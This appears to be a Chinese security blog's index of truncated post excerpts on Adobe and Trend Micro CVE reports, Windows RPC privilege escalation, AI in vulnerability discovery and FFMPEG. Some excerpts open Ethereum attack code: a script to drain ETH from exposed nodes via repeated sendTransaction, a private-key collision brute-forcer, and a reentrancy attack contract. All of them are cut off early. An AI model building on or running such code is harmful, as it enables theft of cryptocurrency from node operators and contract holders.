地狱怪客

Adobe CVE

https://github.com/ZhiyuanWang-Chengdu-Qihoo360/AdobeReader_POC Hello, Thank you for reporting security issues defined below [0]. We are planning to release security update next month for Adobe Acroba […]

windows RPC 编程相关资料

IBM的RPC 编程 够详细 https://www.ibm.com/developerworks/cn/aix/library/au-rpc_programming/   个人博客 Windows RPC Demo实现 https://www.cnblogs.com/wanghaiyang1930/p/4469222.html   RPC漏洞 Windows全版本提权之Win […]

以太坊ETH盗币漏洞代码

大概那些盗币原理也就这样吧~ 循环发送sendTransaction 命令导致对方服务器ETH余额被盗。 守株待兔一个亿不是梦。 #coding:utf-8 import time from web3 import Web3, HTTPProvider import multiprocessing import socket import socks socket.setdefaulttimeou […]

以太坊ETH私钥碰撞代码

学了段时间ETH安全写的私钥碰撞程序 效果有些慢,反正我还没碰撞到。 python不适合,太卡了 #coding:utf-8 import time from web3 import Web3, HTTPProvider from ecdsa import SigningKey, SECP256k1 import sha3 import socks import socket import mul […]

ETH智能合约递归漏洞示例代码

contract Attack{ address owner; address victim; modifier ownerOnly { require(owner == msg.sender); _; } function Attack() payable{ owner = msg.sender; } // 设置已部署的 IDMoney 合约实例地址 function setvictim(add […]

根据私钥算ETH地址

from ecdsa import SigningKey, SECP256k1 import sha3 keccak = sha3.keccak_256() priv = SigningKey.generate(curve=SECP256k1) pub = priv.get_verifying_key().to_string() keccak.update(pub) address = kecca […]

人工智能在漏洞发现中的运用之虚与实

文章来源:https://www.syscan.org/slides/2016_SH_Li_Kang_The_Hype_and_Reality_of_AI_in_Vulnerability_Discovery.pdf 人工智能在漏洞发现中的运用之虚与实 Kang Li kangli.ctf@gmail.com 自我介绍 乔治亚大学教授 Disekt、SecDawgs CTF 团队创始人 xCTF […]

Trend Micro CVE

We have published our Security Bulletin for the vulnerability that you’ve reported on Trend Micro Security driver exploit. Please check this out and let us know if you have concerns: https://esupport. […]

FFMPEG解码学习笔记(一)

文章来源:https://www.cnblogs.com/findman/p/6050580.html FFMPEG的基本处理流程 音频视频同步资料 av_frame_get_pkt_duration(frame) 获取当前帧的持续时间 av_frame_get_pkt_pos(frame) 从最后一个AVPacket进入解码重新排序的偏移量 av_frame_get_best_effort_ti […]